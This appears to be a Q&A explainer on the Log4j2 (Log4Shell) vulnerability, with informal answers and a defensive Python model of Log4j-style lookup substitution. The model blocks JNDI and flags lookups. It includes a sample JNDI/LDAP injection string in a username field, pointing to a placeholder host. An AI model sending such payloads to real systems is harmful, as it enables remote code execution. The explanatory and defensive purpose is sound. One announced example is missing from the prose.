What is the Log4J2 security vulnerability?
AMZ EMPLOYEE
The reason why no software engineers were around to hang out the weekend of Dec 10 :)
The worst :)
A remote code execution vulnerability found with a popular logging framework used in Java.
RCE attack made possible by Apache Logging project.
A Java based security exploit that affects millions of applications.
Log4J is a very popular logging framework used with popular technologies like Spring Boot, Kafka, Redis, etc. One of its key features includes property substitution where log output is dynamically generated based on lookup values.
For example, if you want to get the runtime environment in your log output you may do something like:
The problem with this is Log4J allows different protocols/methods for "looking things up". One of these methods is JNDI lookup.
What they found was that these JNDI lookups can be used to bypass authentication and other security measures to run remote execution of malicious code hosted on LDAP servers.
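A small model of the substitution mechanism that post describes, added here as an example and not Log4j's own code: trusted configuration text (the layout pattern) gets `${type:arg}` lookups resolved, and the difference between the vulnerable and the fixed behaviour is whether untrusted message text gets them resolved too. The `env`/`date`/`jndi` handlers, the `%m` placeholder and the sample log message are constructed stand-ins.

```python
import os
import re
from datetime import datetime

# One Log4j-style lookup: ${type:argument}. The argument may not contain
# another "${", so nested lookups resolve inside-out across rounds.
LOOKUP = re.compile(r"\$\{([A-Za-z]+):([^${}]*)\}")

# Hypothetical stand-ins for built-in lookups (not Log4j's implementation).
def env_lookup(key: str) -> str:
    return os.environ.get(key, "")

def date_lookup(fmt: str) -> str:
    return datetime(2021, 12, 10).strftime(fmt)  # fixed date for reproducible runs

def jndi_lookup(name: str) -> str:
    # A real jndi lookup resolves `name` over the network (e.g. an LDAP server
    # named in the string) and may load what it returns. This model refuses.
    raise PermissionError(f"jndi lookup blocked: {name}")

LOOKUPS = {"env": env_lookup, "date": date_lookup, "jndi": jndi_lookup}

def substitute(text: str, max_rounds: int = 8) -> str:
    """Resolve lookups in text, repeating so nested lookups are handled."""
    def resolve(m: re.Match) -> str:
        handler = LOOKUPS.get(m.group(1).lower())
        return handler(m.group(2)) if handler else m.group(0)  # unknown type: leave as-is
    for _ in range(max_rounds):
        new = LOOKUP.sub(resolve, text)
        if new == text:
            break
        text = new
    return text

def format_log(pattern: str, message: str, message_lookups: bool) -> str:
    """pattern is operator-owned config; message is untrusted, user-supplied data."""
    rendered = substitute(pattern)        # lookups are intended here
    if message_lookups:
        message = substitute(message)     # vulnerable behaviour: untrusted text is evaluated
    return rendered.replace("%m", message, 1)  # fixed behaviour: message inserted literally

def find_lookups(text: str) -> list:
    """Detection helper: lookup types present in untrusted input such as headers."""
    return sorted({m.group(1).lower() for m in LOOKUP.finditer(text)})

# Constructed sample: a login failure message echoing an attacker-controlled username.
SAMPLE_MESSAGE = "login failed for user=${jndi:ldap://placeholder.invalid/x}"
```

With `message_lookups=False` the sample is written to the log verbatim and `find_lookups` flags it for review; with `message_lookups=True` the model raises instead of performing the lookup.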